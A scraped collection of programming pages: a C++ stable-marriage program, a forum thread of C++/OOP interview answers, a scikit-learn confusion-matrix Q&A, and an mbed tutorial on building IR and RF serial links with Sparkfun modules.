        // engagement and engage her with m
        if (prefer[w][i] == m)
            return false;
    }
    return false; // not reached for valid preference lists
}

// Prints stable matching for N boys and N girls. Boys are numbered 0 to
// N-1. Girls are numbered N to 2N-1.
void stableMarriage(int prefer[2*N][N])
{
    // Stores partner of women. This is our output array that
    // stores pairing information. The value of wPartner[i]
    // indicates the partner assigned to woman N+i. Note that
    // the woman numbers are between N and 2*N-1. The value -1
    // indicates that the (N+i)'th woman is free
    int wPartner[N];

    // An array to store availability of men. If mFree[i] is
    // false, then man 'i' is free, otherwise engaged.
    bool mFree[N];

    // Initialize all men and women as free
    memset(wPartner, -1, sizeof(wPartner));
    memset(mFree, false, sizeof(mFree));
    int freeCount = N;

    // While there are free men
    while (freeCount > 0)
    {
        // Pick the first free man (we could pick any)
        int m;
        for (m = 0; m < N; m++)
            if (mFree[m] == false)
                break;

        // One by one go to all women according to m's preferences
        for (int i = 0; i < N && mFree[m] == false; i++)
        {
            int w = prefer[m][i];

            // The woman of preference is free, so w and m become
            // partners (note that the partnership may change later)
            if (wPartner[w-N] == -1)
            {
                wPartner[w-N] = m;
                mFree[m] = true;
                freeCount--;
            }
            else // If w is not free
            {
                // Find the current engagement of w
                int m1 = wPartner[w-N];

                // If w prefers m over her current engagement m1,
                // then break the engagement between w and m1 and
                // engage m with w.
                if (wPrefersM1OverM(prefer, w, m, m1) == false)
                {
                    wPartner[w-N] = m;
                    mFree[m] = true;
                    mFree[m1] = false;
                }
            }
        }
    }

    // Print the solution
    cout << "Woman   Man" << endl;
    for (int i = 0; i < N; i++)
        cout << " " << i+N << "\t" << wPartner[i] << endl;
}

// Driver program to test the above functions
int main()
{
    // The first N rows are the preference lists of the men and the
    // last N rows are those of the women
    int prefer[2*N][N] = { {7, 5, 6, 4},
                           {5, 4, 6, 7},
                           {4, 5, 6, 7},
                           {4, 5, 6, 7},
                           {0, 1, 2, 3},
                           {0, 1, 2, 3},
                           {0, 1, 2, 3},
                           {0, 1, 2, 3} };
    stableMarriage(prefer);
    return 0;
}

Output:

$ g++ MatchingProblem.cpp
$ a.out
Woman   Man
 4      2
 5      1
 6      3
 7      0

------------------
(program exited with code: 0)
Press return to continue

Sanfoundry Global Education & Learning Series - 1000 C++ Programs.

Here's the list of Best Reference Books in C++ Programming, Data Structures and Algorithms.
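The pairing shown in the output can be cross-checked with a compact Python re-implementation of Gale-Shapley (a sketch for verification, not part of the original program; men are 0..N-1, women N..2N-1, mirroring the C++ numbering):

```python
def stable_marriage(prefer, n):
    """Gale-Shapley: men 0..n-1 propose in preference order, women
    n..2n-1 accept or trade up. prefer mirrors the 2N x N table."""
    w_partner = {w: None for w in range(n, 2 * n)}  # woman -> man
    free_men = list(range(n))
    next_choice = [0] * n  # next woman each man will propose to
    while free_men:
        m = free_men.pop(0)
        w = prefer[m][next_choice[m]]
        next_choice[m] += 1
        cur = w_partner[w]
        if cur is None:
            w_partner[w] = m                     # she was free
        elif prefer[w].index(m) < prefer[w].index(cur):
            w_partner[w] = m                     # she trades up
            free_men.append(cur)
        else:
            free_men.append(m)                   # she rejects m
    return w_partner

prefer = [
    [7, 5, 6, 4], [5, 4, 6, 7], [4, 5, 6, 7], [4, 5, 6, 7],  # men
    [0, 1, 2, 3], [0, 1, 2, 3], [0, 1, 2, 3], [0, 1, 2, 3],  # women
]
```

With this preference table, stable_marriage(prefer, 4) reproduces the C++ program's output: woman 4 with man 2, 5 with 1, 6 with 3, and 7 with 0.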
https://www.sanfoundry.com/cpp-program-solve-matching-problem-given-specific-case3/
What is the use/advantage of function overloading?

Please suggest uses of function overloading.

Nandini - Mar 2nd, 2018
Code maintenance is easy.

supriya - May 24th, 2017
With the help of function overloading we can reuse the same function name without declaring it again and again; as per our requirements we can vary the parameters of the same function and call it from our subclasses.

Difference between data encapsulation vs abstraction

PRANIT PATIL - Nov 27th, 2017
Encapsulation and abstraction both solve the same problem, complexity, but in different dimensions. Abstraction hides the implementation details of your methods and provides a base for variations in the app...

tuba - Jun 10th, 2016
Abstraction is the method in which we write the coding in another class, in which we do not know how our function works. For example SMS, in which we only send the message; we do not know how we send it or what m...

How do you differentiate between a constructor and a normal function?

Sumit Payasi - Oct 2nd, 2017
A constructor is a special function which has the same name as the class name; a constructor performs automatic initialization of an object. A constructor should not have any return type. A constructor must be invoked wi...

udayakumar - Sep 28th, 2016
Method:
1) The method may or may not be present in the class
2) The method will have a return type
3) The method is invoked with reference to an object of the class
Constructor:
1) If you write o...

Compile Time Overloading

What is the requirement of compile time overloading?

Mamta - Sep 14th, 2017
Compile time overloading (static binding or early binding) means having the same method name with different arguments. Example:
sample(int a)
sample(int a, int b)
sample(char a)
sample(int a, char b)
sample(int a, char b, string c)
All of these are examples of compile time overloading.

Praveen - Jan 16th, 2012
We know that because of polymorphism, we can declare any number of functions with a change in signature. A signature considers three parts:
1. Number of parameters
2. Type of parameters
3. Order of parameters...
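C++ resolves overloads at compile time from the argument types. In a language without that feature, the same idea can be approximated by dispatching on the runtime type of the first argument, e.g. with Python's functools.singledispatch (an illustrative analogue of overloading, not overloading in the C++ sense):

```python
from functools import singledispatch

@singledispatch
def describe(value):
    # Fallback for any type without a registered overload
    return "unknown"

@describe.register
def _(value: int):
    return "int"

@describe.register
def _(value: str):
    return "str"
```

Calling describe(10) selects the int variant and describe("hi") the str variant, while describe(3.5) falls back to the default, which is the closest Python gets to the compile-time overload resolution described above.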
What is static identifier?

Amit - Jun 21st, 2017
A variable declared as static in a function is initialized once, and retains its value between function calls. The default initial value of an uninitialized static variable is zero.

yogeshpanda - Sep 21st, 2005
Static variables persist their values between function calls, and a static member function is outside the class scope of any object, meaning it can be invoked without the use of an object (it can be invoked by classname::functionname).

What does static variable mean?

supriya - May 24th, 2017
A static variable can be used anywhere within its class.

vignesh - Feb 10th, 2017
A function-scope or block-scope variable that is declared as static is visible only within that scope. Furthermore, static variables only have a single instance. In the case of function or block-scope...

Explain the advantages of OOPs with examples.

nimesh diyora - Feb 11th, 2017
Code reuse and recycling: objects created for object-oriented programs can easily be reused in other programs. Encapsulation (part 1): once an object is created, knowledge of its implementation is no...

sabari - Nov 18th, 2016
Code reuse; fewer lines of code.

What is the similarity between a Structure, Union and enumeration?

dhivyanatesh - Aug 19th, 2016
Structure and union both allow us to group variables of mixed data types into a single entity.

Resh - Jul 20th, 2016
All are helpful in defining new data types.

Advantages of object-oriented modeling?

Elizabeth - Jun 15th, 2016
Increased consistency between analysis, design, and programming activities.

sripri - May 2nd, 2007
The advantage of object-oriented modeling is the fact that objects encapsulate state, expressed by attributes, and behavior, specified by methods or operations, and they are able to communicate by sending and...

What is near, far and huge pointers? How many bytes are occupied by them?
PAWAN KUMAR TIWARI - Jun 12th, 2016
Near = 2, far = 4, huge = 4

ankit_k7 - Dec 7th, 2007
A near pointer occupies 16 bits; far and huge pointers occupy 32 bits.

What are the different types of polymorphism?

syedafarzana - Mar 31st, 2016
Compile-time polymorphism and runtime polymorphism.

tux - Jul 4th, 2015
There are two types: controlled and uncontrolled polymorphism. Overloading doesn't belong to the types of polymorphism; overriding is the tool to implement polymorphism.

What is OOPS?

OOP is the common abbreviation for Object-Oriented Programming.

MD SADDAM HUSSAIN - Mar 22nd, 2016
Object-Oriented Programming is a paradigm that provides many concepts such as inheritance, data binding, polymorphism etc.

pooja odhekar - Feb 28th, 2013
OOPS provides features like polymorphism, inheritance, and abstraction.

What is an Abstraction? Does C support abstraction? With example... and what is the difference between abstraction and encapsulation?

Samyuktha Reddy - Mar 22nd, 2016
Hiding the programming elements which are encapsulated.

PRIYADHARSHINI - Mar 16th, 2016
Abstraction means hiding information.

Write a C++ program to accept three digits (i.e. 0-9) and print all possible combinations from these digits. (For example, if the three digits are 1, 2, 3 then all possible combinations are 123, 132, 231, 213, 312, 321 etc.)

Lineesh K Mohan - Mar 22nd, 2016
"cpp #include #include using namespace std; int main() { int arrNum[3] = {0}; int nTemp = 0; int nI = 0, nJ = 0, nK = 0; coutnTemp; ...

adnan - Jan 13th, 2016
"cpp Yanesh Tyagi Dec 23rd, 2006 /* Program to write combinations of a 3 digit number Author: Rachit Tyagi Date: 23-Dec-2006 2345 IST */ #include #include void ...

Can you use the function fprintf() to display the output on the screen?

Helal - Jan 28th, 2016
Which function is used to display the output on the screen?
veena - Dec 15th, 2006
Yes, we can:

#include <stdio.h>
#include <conio.h>
void main()
{
    fprintf(stdout, "sdfsdf");
    getch();
}

fprintf() accepts a first argument which is a file pointer to a stream; stdout is also a file pointer, to the standard output (screen).

Merits and demerits of friend function

PRERNA - Nov 7th, 2015
- Provides additional functionality which is kept outside the class.
- Provides functions that need data which is not normally used by the class.
- Allows sharing private class information with a non-member function.

vadivel kumar - Sep 17th, 2015
It can access the member functions of another class.

Are the variables argc and argv local to main?

yogesh kumar - Aug 21st, 2015
Can we change these argv and argc command line arguments?

laki.sreekanth - Jul 17th, 2010
Yes, because these variables are written in the main function only, not outside main. They belong to the main block, not to others. So, to my knowledge, these command line arguments are local to main.

Controlled and uncontrolled redundancy

What is the difference between controlled and uncontrolled redundancy? Illustrate with examples.

Dhanalakshmi - Jul 19th, 2015
Both are types of polymorphism. Compile-time polymorphism is the controlled one; dynamic polymorphism is uncontrolled.

Why do we need to create an object for a final class, and what are its benefits?

Ahmed reda - Jun 29th, 2015
A final class cannot have any subclasses. This just means that nobody can create a subclass that modifies the behaviour of the final class by modifying internal data or overriding methods so they behave d...

Bimal Modak - Jan 14th, 2015
We can create an object of a final class, and this will act like any simple object created for a simple class. "java public final class BlockTest { public void testMethod(){ S...
http://www.geekinterview.com/Interview-Questions/Concepts/OOPS
I am a newbie in machine learning. Recently, I learnt how to calculate the confusion_matrix for the test set of a KNN classification:

# Split test and train data
import numpy as np
from sklearn.model_selection import train_test_split
X = np.array(dataset.ix[:, 1:10])
y = np.array(dataset['benign_malignant'])
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)

# Define classifier
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)
knn.fit(X_train, y_train)

# Predicting the test set results
y_pred = knn.predict(X_test)

# Making the confusion matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)  # confusion matrix for the test set

Now I want to calculate the confusion_matrix for the training set as well, including when using k-fold cross-validation, where I call knn.fit(X_train, y_train) in each fold. The following code computes the confusion_matrix for the test fold in each iteration:

# Applying the k-fold method
from sklearn.cross_validation import StratifiedKFold
kfold = 10  # no. of folds (better to have this at the start of the code)

# Stratified KFold: this first divides the data into k folds, and also makes
# sure that the distribution of the data in each fold follows the original
# input distribution
# Note: in future versions of scikit-learn, this module will be fused with model_selection
skf = StratifiedKFold(y, kfold, random_state=0)

skfind = [None] * len(skf)  # indices
cnt = 0
for train_index in skf:
    skfind[cnt] = train_index
    cnt = cnt + 1
# skfind[i][0] -> train indices, skfind[i][1] -> test indices

# Supervised classification with k-fold cross-validation
from sklearn.metrics import confusion_matrix
from sklearn.neighbors import KNeighborsClassifier

conf_mat = np.zeros((2, 2))  # initializing the confusion matrix

# 10-fold cross-validation
for i in range(kfold):
    train_indices = skfind[i][0]
    test_indices = skfind[i][1]

    clf = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)
    X_train = X[train_indices]
    y_train = y[train_indices]
    X_test = X[test_indices]
    y_test = y[test_indices]

    # Fit on the training fold
    clf.fit(X_train, y_train)

    # Predict the test fold
    y_predict_test = clf.predict(X_test)  # output is labels, not indices

    # Compute the confusion matrix
    cm = confusion_matrix(y_test, y_predict_test)
    print(cm)
    # conf_mat = conf_mat + cm

You don't have to make many changes:

# Predicting the training set results
y_train_pred = knn.predict(X_train)
cm_train = confusion_matrix(y_train, y_train_pred)

Here, instead of using X_test we use X_train for classification, and then we produce a classification matrix using the predicted classes for the training dataset and the actual classes. The idea behind a classification matrix is essentially to find out the number of classifications falling into four categories (if y is binary). So as long as you have two sets, predicted and actual, you can create the confusion matrix. All you have to do is predict the classes and use the actual classes to get the confusion matrix.
EDIT

In the cross-validation part, you can add a line

y_predict_train = clf.predict(X_train)

to calculate the confusion matrix for each iteration. You can do this because in the loop you initialize clf every time, which basically means resetting your model.

Also, in your code you are finding the confusion matrix each time, but you are not storing it anywhere. At the end you'll be left with a cm of just the last test set.
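The "two sets, predicted and actual" idea is easy to see without sklearn at all. A pure-Python sketch of a binary confusion matrix (illustrative only; it follows sklearn's convention of rows = actual class, columns = predicted class):

```python
def confusion_matrix_2x2(y_true, y_pred):
    """2x2 confusion matrix [[TN, FP], [FN, TP]] for binary labels 0/1,
    with rows indexed by the actual class and columns by the predicted."""
    m = [[0, 0], [0, 0]]
    for t, p in zip(y_true, y_pred):
        m[t][p] += 1
    return m

y_true = [0, 0, 1, 1, 1]   # actual classes
y_pred = [0, 1, 1, 1, 0]   # predicted classes
```

With these toy labels the result is [[1, 1], [1, 2]]: one true negative, one false positive, one false negative, and two true positives. Swapping in training labels and training predictions gives the training-set matrix with no other changes, which is exactly the point of the answer above.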
https://codedump.io/share/nE7P2EmRtMwU/1/calculate-confusionmatrix-for-training-set
Wi-Fi and Bluetooth use 2.4GHz. Cordless phones use 900MHz, 2.4GHz, and now 5.8GHz. Key fobs, garage door openers, and some home automation systems use 315MHz or 434MHz. Since these devices are used in mass-produced consumer products, these parts are widely available and relatively inexpensive.

TV remotes use an Infrared LED

Car key fobs use RF

Using some low-cost parts and breakout boards that should only cost around US $10 per demo, two basic demos will be set up, one using IR and one using RF. Each demo has a transmitter and matched receiver attached to mbed. To keep it simple, in each case 8-bit ASCII character data will be sent out over the link and received back using mbed's serial port hardware. A terminal application running on the PC attached to mbed's USB virtual com port will be used to type in test data. The data will only appear back on the PC if the IR or RF communications link is operating correctly.

Serial ports use a 10-bit protocol to transfer each character. The idle state of the serial TX pin is high. The first bit, the start bit, takes the signal low. It is followed by the 8 bits of ASCII character data and a high stop bit (a total of 10 bits). The rate at which bits change is called the baud rate. The low-cost devices used in the demos will operate at 1200-2400 baud max (here equal to bits per second (bps)).

For the demo, both the transmitter and receiver are attached to mbed, but in a typical application they would be on different subsystems, each with its own processor, physically separated by several meters.

IR and RF communication links assembled on a breadboard for the demo.

IR transmit and receive demo

Consumer IR devices use an infrared LED in the handheld remote and an IR receiver located inside the device. Since sunlight and ambient room lighting would interfere with any IR detector just looking at light levels, the signal modulates (i.e., turns on and off) a high-frequency carrier signal. This is called amplitude shift keying (ASK).
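The 10-bit serial framing described above can be sketched in a few lines of Python (a simulation for illustration, not mbed code; the UART shifts data bits out LSB first):

```python
def uart_frame(byte):
    """Build the 10-bit UART frame for one byte:
    a low start bit, 8 data bits (LSB first), and a high stop bit."""
    bits = [0]                                   # start bit (low)
    bits += [(byte >> i) & 1 for i in range(8)]  # data bits, LSB first
    bits.append(1)                               # stop bit (high)
    return bits

# 'A' is 0x41, so its frame is the start bit, 1,0,0,0,0,0,1,0, then the stop bit
frame = uart_frame(ord('A'))
```

At 2400 baud, each of the 10 bits occupies about 417 microseconds on the line, so one character takes roughly 4.2ms to transfer.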
Typically for IR, the carrier frequency is in the 30-60kHz range, with 38kHz being the most common. There are a few early first-generation electronic ballasts for fluorescent lights operating in this range that can cause interference with IR remotes, but in most cases it works well. This means that the IR LED transmitter must be modulated. On mbed, this can be done using the PWM hardware. The IR detector modules have a built-in bandpass filter and hardware to demodulate and recover the original signal.

Sparkfun IR LED transmitter module

The Sparkfun IR LED breakout board seen above contains a 50mA high-output IR LED and a driver circuit using a transistor, as seen in the schematic below. A discrete IR LED can be used instead now that this board is no longer available, but the circuit still needs the correct polarity to control the LED on/off state, since the serial port's internal UART receiver hardware must have a low start bit and a high stop bit to work. A discrete IR LED should have an operating voltage of around 1.5V, so don't forget the series voltage-dropping resistor!

Schematic of the IR LED breakout board

Sparkfun IR receiver module

The Sparkfun IR receiver breakout board seen above contains a Vishay TSOP853 38kHz IR receiver module. The block diagram is seen below.

IR receiver module block diagram

A newer 38kHz IR receiver module from Sparkfun should also work for the demo.

Wiring

Solder header pins into the breakout boards and everything will hook up on a breadboard. Point the IR LED towards the receiver breakout board. At a range of just a few inches the receiver can pick up the signal from the side, in case you have trouble pointing it directly towards the IR LED. Long right-angle header pins might be a good idea on these IR breakout boards, since they can then be mounted sticking up and directly facing each other.
At close range, your hand or a piece of paper will reflect back enough IR to transmit the signal in case you can't mount them facing each other on the breadboard.

IR Demo Code

In the demo code, mbed's PWM hardware supplies the 38kHz carrier for transmission. The PWM period is set to 1/38000. The IR LED CTRL input is driven by the 38kHz PWM signal. IRLED = 0.5 generates a 50% PWM duty cycle to produce a 38kHz square wave for the carrier. The gnd pin on the IR LED is actually switched on and off using mbed's serial data output to eliminate the need for any external digital logic, and still permit direct use of the serial port hardware for 38kHz IR data transmission. It is a bit more complex than it appears at first glance, since the start bit must be zero for the 10-bit serial port input hardware to work, and the IR receiver inverts the signal.

IR_Demo

#include "mbed.h"

Serial pc(USBTX, USBRX); // tx, rx
Serial device(p13, p14); // tx, rx
DigitalOut myled1(LED1);
DigitalOut myled2(LED2);
PwmOut IRLED(p21);

//IR send and receive demo
//LED1 and LED2 indicate TX/RX activity
//Character typed in PC terminal application sent out and returned back using IR transmitter and receiver
int main()
{
    //IR Transmit code
    IRLED.period(1.0/38000.0);
    IRLED = 0.5; //Drive IR LED data pin with 38kHz PWM carrier
    //Drive IR LED gnd pin with serial TX
    device.baud(2400);
    while(1) {
        if(pc.readable()) {
            myled1 = 1;
            device.putc(pc.getc());
            myled1 = 0;
        }
        //IR Receive code
        if(device.readable()) {
            myled2 = 1;
            pc.putc(device.getc());
            myled2 = 0;
        }
    }
}

Import program: IR_demo - IR transmit and receive demo using Sparkfun breakout boards

Characters typed in the PC terminal window are sent out over the IR link, read back in on the serial port, and echoed back in the terminal application window. If the characters typed in do not appear in the window as they are typed, there is a problem with the IR link. LED1 and LED2 on mbed are used to indicate TX and RX activity.
If you only see a few occasional errors, look around for a fluorescent light that might be causing interference. While running the demo, if you happen to have an IR remote control handy, point it at the IR receiver and hit a button. Assuming that the IR remote uses a carrier near 38kHz, you should see a random-looking string of characters on the PC every time you hit a button.

A camera can detect the invisible IR light from an IR LED

While you can't see the IR light from an IR LED with your eyes directly to see if it is working, it will show up on a webcam, digital camera, or cell phone camera as a faint purple light, as seen in the image on the right above. The IR LED is off in the left image. Unlike your eyes, the image sensors used in cameras have a slight response to IR light.

Applications that need to transfer longer streams of data, and not just 8-bit characters, will need somewhat more complex code for a different communications protocol. In most cases, shifting, some bit banging, and time delays will be needed, since it will not be possible to use the serial transmission protocol implemented in hardware in mbed's serial port UART. On mbed, a PwmOut pin can also be used to drive a low-power IR LED directly, or the CTL input on the IR breakout board. In that case, the IR LED breakout board power pins are tied to 5V and gnd, producing a bit more drive current for the LED than the demo setup. Set the period to 38kHz, and assign the PWM output a value of 0.0 to turn it off (sends a "0" bit) or a value of 0.5 to turn it on (sends a "1" bit as a 38kHz square wave). In this case the serial port hardware would not be used at all; the software shifts out each bit. Each data bit would need to be shifted over, masked off, and used to drive the PWM output pin after the appropriate time delay using wait(). Several cycles of the carrier frequency are required for the receiver to lock onto each bit, and this sets the maximum data transfer rate (around 2400bps).
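The bit-banged scheme above amounts to turning the 38kHz carrier on for "1" bits and off for "0" bits. A Python sketch of the resulting burst schedule (an illustration only, not mbed code; the 417 microseconds per bit assumes roughly 2400 baud):

```python
BIT_US = 417  # assumed bit time in microseconds (~2400 baud)

def carrier_bursts(bits, bit_us=BIT_US):
    """Return (carrier_on, duration_us) pairs for a bit string:
    a '1' bit is a burst of 38 kHz carrier, a '0' bit is silence.
    Adjacent bits of the same value merge into one longer burst."""
    bursts = []
    for b in bits:
        on = bool(b)
        if bursts and bursts[-1][0] == on:
            # extend the previous burst rather than starting a new one
            bursts[-1] = (on, bursts[-1][1] + bit_us)
        else:
            bursts.append((on, bit_us))
    return bursts
```

For the bits 1,1,0,1 this yields an 834-microsecond carrier burst, a 417-microsecond gap, and a final 417-microsecond burst, which is the on/off pattern the PwmOut pin would be driven through with wait() delays.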
Consumer IR remotes send out a long continuous stream of bits (around 12-50 bits long) for each button, so the serial port cannot be used to send these codes (i.e., there are no start and stop bits for every eight bits of data). Universal remotes with learning have an IR detector, and they learn by recording the bit pattern from the old IR remote control and then playing it back. More information on consumer IR signal formats is available online. Two cookbook projects, TxIR and IR remote, provide additional insight into this approach and code examples for mbed. LIRC is a PC application designed to decode and send consumer IR signals. An extensive table of the IR formats and codes from LIRC used by different manufacturers is available, along with a description of the table format. The IR codes often contain preamble bits that help the receiver's automatic gain control (AGC) circuit adjust the gain to the signal strength to minimize errors.

IrDA is an infrared communications protocol designed to work at a range of around 1 meter. The IrDA IR signal is not modulated; it relies on high signal strength at a short distance to overcome interference from ambient light. It was a bit more popular in portable devices prior to the introduction of Wi-Fi and Bluetooth. It would require a different IR detector, without a bandpass filter and demodulator, along with software to implement the complex protocols needed for data transfer. IrDA transceiver modules are available in packages similar to the IR receiver used in the demo, with data rates from 115kbps to 4000kbps.

RF transmit and receive demo

RF remotes tend to cost a bit more, have longer range, and are not line-of-sight only, as is the case for IR. Most car key fobs operate at 315MHz or 434MHz. Most key fob systems use encryption to prevent a car thief from intercepting and spoofing the codes. Rolling codes are used in most remotes to prevent simple "replay" devices from gaining access.
Governments allocate and license the use of RF frequencies and place limits on power output, so the frequencies used can vary from country to country. A final product with RF modules may require testing and certification. In the USA, many products using RF are required to have a label with an FCC ID number that can be searched to quickly determine the operating frequency of the device.

Sparkfun RF transmitter module

For the RF demo, the 315MHz RF transmitter module seen above was used. It uses a surface acoustic wave (SAW) device, the metal can seen in the image above. A SAW device has significant performance, cost, and size advantages over the traditional quartz crystal for a fixed-frequency transmitter. The RF transmitter's 315MHz carrier is turned on and off by the signal (ASK modulation). This is similar to the earlier IR example, but operating at a much higher frequency in the UHF range (315MHz vs. 38kHz). A similar pair of 434MHz modules is also available from Sparkfun and is more common in Europe and Asia. The pins have the same function, and the demo should also work for the 434MHz modules without changes (other than a shorter antenna length).

Schematic of a SAW transmitter

The schematic is hard to find for each module, but a typical SAW transmitter for this frequency range is shown above. Basically, it has a high-frequency transistor, the SAW device for the correct frequency, and some RLCs. This looks identical to the circuit found on the back side of the Sparkfun module.

Sparkfun RF receiver module

The 315MHz Sparkfun RF receiver module seen above is used in the demo to receive the signal. These modules are also available from a number of other sources. Similar RF modules in small surface-mount packages are also available, but a breakout board would be needed for use on a breadboard. The datasheets provide little information, but the module is basically a low-cost, bare-bones super-regenerative receiver.
A super-regenerative receiver uses a minimum of parts and has a basic automatic gain control (AGC). An AGC attempts to automatically adjust the amplification (gain) needed to match the signal strength.

A schematic for a 434MHz RF receiver module

The datasheet does not include a schematic, but a schematic is shown above for another RF module in this frequency range, and the same parts are found on the Sparkfun receiver module: a dual op amp, two high-frequency transistors, some RLCs, and a variable inductor with a screw slug for frequency tuning. For a more in-depth discussion of how the various parts of this circuit function, see the references on super-regenerative receiver design. On the breadboard, a decoupling capacitor of 330uF was placed near the power pins of each module, and it greatly reduced transmission errors. Some PCs also seem to have a bit more noise present on the USB 5V power lines than others, and this can increase the RF transmission error rate and the need for decoupling capacitors. Each module has an antenna pin, and a 6-13cm jumper wire works well as an antenna at short distances on a breadboard. At greater distances, the antenna would need to be longer (1/4 wave = 23cm at 315MHz is suggested). To get maximum range, don't forget that a 1/4-wave monopole antenna is supposed to be sticking above (but not touching) a ground plane about the same size as the antenna. Earth approximates a ground plane, but metal provides more directional gain. The RF modules have a maximum range of up to 160m under perfect conditions. Some of the newer surface-mount RF modules mounted on breakouts have a range of 1000m or more, with a corresponding increase in price. Antenna size in a final product can also be reduced using several techniques.

Wiring

The RF modules have pins with spacing that fits standard breadboards. Exercise some caution inserting the modules into the breadboard, as they are not quite as sturdy as standard IC pins.
The pins are also a bit smaller in size, and on some breadboards they need to be adjusted a bit for a good clean contact. On this demo setup, the receiver had more errors until the module was pulled up a bit from the breadboard. Make certain that you hook up all of the power and ground pins. If the RF modules are placed too close together on a breadboard, it can cause errors. In the demo setup, the metal can on the transmitter module was placed facing the receiver module to provide a bit of shielding.

RF Demo Code

In the RF demo, data is sent out over the serial port, transferred using the RF link, and read back in on the serial port. It seems straightforward, but to keep the transmitter and receiver locked on, the signal needs to be constantly changing. In the demo, the idle state constantly sends out a 10101010 pattern to keep the receiver locked onto the correct gain for the signal's strength. Without sending the sync pattern, if no change in data occurs for several ms, the receiver's AGC will start turning up the gain. Eventually, it cranks the gain way up and outputs whatever RF noise it sees at the time (the digital data output appears to be almost random noise when this happens).
RF_Demo

#include "mbed.h"

Serial pc(USBTX, USBRX); // tx, rx
Serial device(p9, p10); // tx, rx
DigitalOut myled1(LED1);
DigitalOut myled2(LED2);

//RF link demo using low-cost Sparkfun RF transmitter and receiver modules
//LEDs indicate link activity
//Characters typed in PC terminal window will echo back using RF link
int main()
{
    char temp = 0;
    device.baud(2400);
    while (1) {
        //RF Transmit Code
        if (pc.readable()==0) {
            myled1 = 1;
            //Send 10101010 pattern when idle to keep receiver's AGC gain locked to transmitter's signal
            //When receiver loses the signal lock (around 10-30ms with no data change seen) it starts sending out noise
            device.putc(0xAA);
            myled1 = 0;
        } else {
            //Send out the real data whenever a key is typed
            device.putc(pc.getc());
        }
        //RF Receive Code
        if (device.readable()) {
            myled2 = 1;
            temp = device.getc();
            //Ignore sync pattern and do not pass it on to the PC
            if (temp != 0xAA)
                pc.putc(temp);
            myled2 = 0;
        }
    }
}

Import program: RF_loopback_test - RF link test program using low-cost modules from Sparkfun

Characters typed in the PC terminal window are sent out over the RF link, read back in on the serial port, and echoed back in the terminal application window. Keep in mind that any RF link will occasionally experience errors and is subject to interference from other RF sources nearby, cosmic radiation, and thunderstorms. If you happen to have a car key fob that operates at 315MHz (or 434MHz in Europe and Asia), try holding it right next to the receiver antenna when running the demo and hit a button. Typically, you will see a long random-looking string of characters when it generates and transmits the encrypted code for the button. If you disconnect power to the transmitter chip, the receiver's AGC will crank up the gain until it starts sending out the background RF noise converted to random strings of ASCII characters. The demo code leaves the transmitter turned on. Some applications may need to turn off the transmitter whenever it is not sending data out on the serial port.
When the transmitter turns on, sending a preamble of 0xFF, 0xFF, 0x00, 0x55 and having the receiver wait for the 0x55 before accepting data will help the receiver's AGC lock onto the signal strength a bit faster. Instead of using the serial port hardware directly and constantly sending a sync character, bit banging and a different sync method or an encoding scheme that always changes the data could be used. Two such common coding schemes are NRZ and Manchester coding. This type of receiver works best with an encoding scheme that has a DC level (average value) near zero (i.e., 50% "0"s and 50% "1"s in the digital signal). It is also possible to tune the receiver circuit to the transmitter by adjusting the screw on the receiver module, but they seem to be set very close at the factory and the tuning procedure is a bit involved. Tuning will probably be needed only if the link is operating near its maximum range.

A drawback of these simple receivers is the automatic gain control (AGC) slowly turning up the gain until the digital output starts to toggle from background noise whenever a signal is not present. Some designs disable the receiver output when RSSI falls below a fixed threshold (i.e., a squelch feature). One widely used IR and RF transmission protocol sends a preamble to lock the AGC to the correct level, followed by the data and then the inverse of the data. This ensures that the signal's DC level is always near zero to keep the AGC locked onto the signal. By checking each data byte against its inverse, errors can also be detected by the receiver. The disadvantage is that you lose half of the usable transmission bandwidth by sending the data bytes twice. Another wireless protocol sends the data three times and uses a majority vote to attempt to correct errors whenever a checksum or CRC error occurs on a packet of data. There is an mbed cookbook project using this transmitter module to send signals to the X10 home automation wireless receiver.
These low-cost IR and RF devices designed for remotes have limited bandwidth. If you need to transfer large amounts of data, there are other wireless options to consider.

A Wijit Smart AC Plug

The Wijit is one of the newer low-cost home automation examples. It has a Wi-Fi hub that communicates with 10A relay-controlled plug modules using a newer generation of 434 MHz RF receiver and transmitter modules similar to those used earlier. Information on the Wijit is a bit hard to find, but some details and internal photos are available from the FCC approval filings. The plugs can be controlled from a free smartphone app.

Additional Wireless Options

These demos show just the basics of getting the communication channel operational. In the case of a handheld remote, if the signal is not received the user just hits the button again and perhaps moves closer. For applications that need more reliability, a bidirectional link would be required. One solution to support bidirectional communication is for each device to have a transmitter and a receiver operating at a different frequency. Another possibility is to turn off the transmitter when it is not sending data; this requires a more complex protocol such as CSMA to solve the problems that would occur whenever two devices start to transmit at the same time. Being able to send data in both directions would allow each message to be acknowledged and checked for transmission errors using a checksum or CRC. In case of an error, the message could automatically be retransmitted. Many of the higher-data-rate RF modules use frequency shift keying (FSK) instead of the simpler ASK for modulation. Similar to AM versus FM commercial radio broadcasts, having the signal change the frequency of the carrier provides more noise immunity than changing the amplitude, but it also requires a bit more hardware and power. More advanced wireless systems also have several channels at different frequencies, and they automatically switch to an inactive channel to avoid conflicts.
These techniques are required for reliable networking, and many are built into the more complex and costly wireless communication standards and protocols such as WiFi, Bluetooth and Zigbee. In general, higher data rates, longer range, and higher reliability always add to the power used, hardware cost, and software complexity. If you need higher data transfer rates and higher reliability, there are several wireless networking solutions available on breakout boards with mbed code examples in the wireless section of the mbed cookbook. These modules offer a drop-in solution and typically have an RF transceiver along with a microcontroller running firmware that implements the wireless protocol. Other wireless modules available on breakout boards to consider for use with mbed, all with mbed code examples, are:

RFM22B (128 kbps low-cost FSK transceiver)
XBee (Zigbee)
RN-42 (Bluetooth)
WiFly (WiFi)

Extending the Range on RF Devices

For longer range, more advanced antennas with high directional gain pointed in the correct direction can be used for stationary transmitters and receivers. The Wi-Fi antenna seen below worked at 56 km using 200 mW of RF power with a gain of 23.5 dBi. RF amplifiers can also be used to boost RF output and increase range, but check the regulations and limitations in each country on RF output power. The 1000 mW RF amplifier seen below can boost Wi-Fi range to 12 km and has been used for remote control of UAVs.

2.4 GHz grid antenna with 23.5 dBi gain
1000 mW 2.4 GHz RF amplifier

Comments on IR and RF remote controls:

